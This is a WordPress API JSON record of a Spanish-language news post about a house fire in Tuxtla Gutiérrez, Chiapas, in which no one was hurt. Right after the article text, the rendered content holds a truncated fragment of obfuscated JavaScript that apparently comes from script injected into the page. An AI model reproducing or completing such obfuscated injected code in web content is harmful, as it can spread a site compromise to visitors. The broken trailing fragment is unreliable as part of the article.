{"id":9354,"date":"2023-04-03T01:46:06","date_gmt":"2023-04-03T01:46:06","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9354"},"modified":"2023-04-03T01:46:07","modified_gmt":"2023-04-03T01:46:07","slug":"se-registra-incendio-en-vivienda-del-fraccionamiento-montebello","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9354","title":{"rendered":"Se registra incendio en vivienda del Fraccionamiento Montebello"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230402-WA0017-1024x576.jpg\" alt=\"\" class=\"wp-image-9355\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230402-WA0017-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230402-WA0017-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230402-WA0017-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230402-WA0017-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230402-WA0017.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p> Jairo Camacho.Agencia ReporteCiudadano, 2 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este domingo por la tarde  se registr\u00f3 un incendio en una vivienda del Fraccionamiento Montebello de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, los mismos propietarios de la casa localizada sobre la Calle Laguna Encantada y Avenida Laguna Ensue\u00f1o estaban en la parte baja cuando comenzaron a sentir un fuerte olor a humo y al subir pudieron percatarse que el fuego se hab\u00eda propagado en un cuarto y pidieron ayuda a los n\u00fameros de emergencias.Al lugar arribaron elementos de Bomberos para apagar el fuego y minutos despu\u00e9s qued\u00f3 sofocado.Por el incendio hubo grandes p\u00e9rdidas materiales pero no hubo v\u00edctimas que lamentar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 2 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este domingo por la tarde se registr\u00f3 un incendio en una vivienda del Fraccionamiento Montebello de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, los mismos propietarios de la casa localizada sobre la Calle Laguna Encantada y Avenida Laguna Ensue\u00f1o estaban en la parte baja cuando comenzaron &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9355,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9354","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9354","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9354"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9354\/revisions"}],"predecessor-version":[{"id":9356,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9354\/revisions\/9356"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9355"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9354"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9354"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9354"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}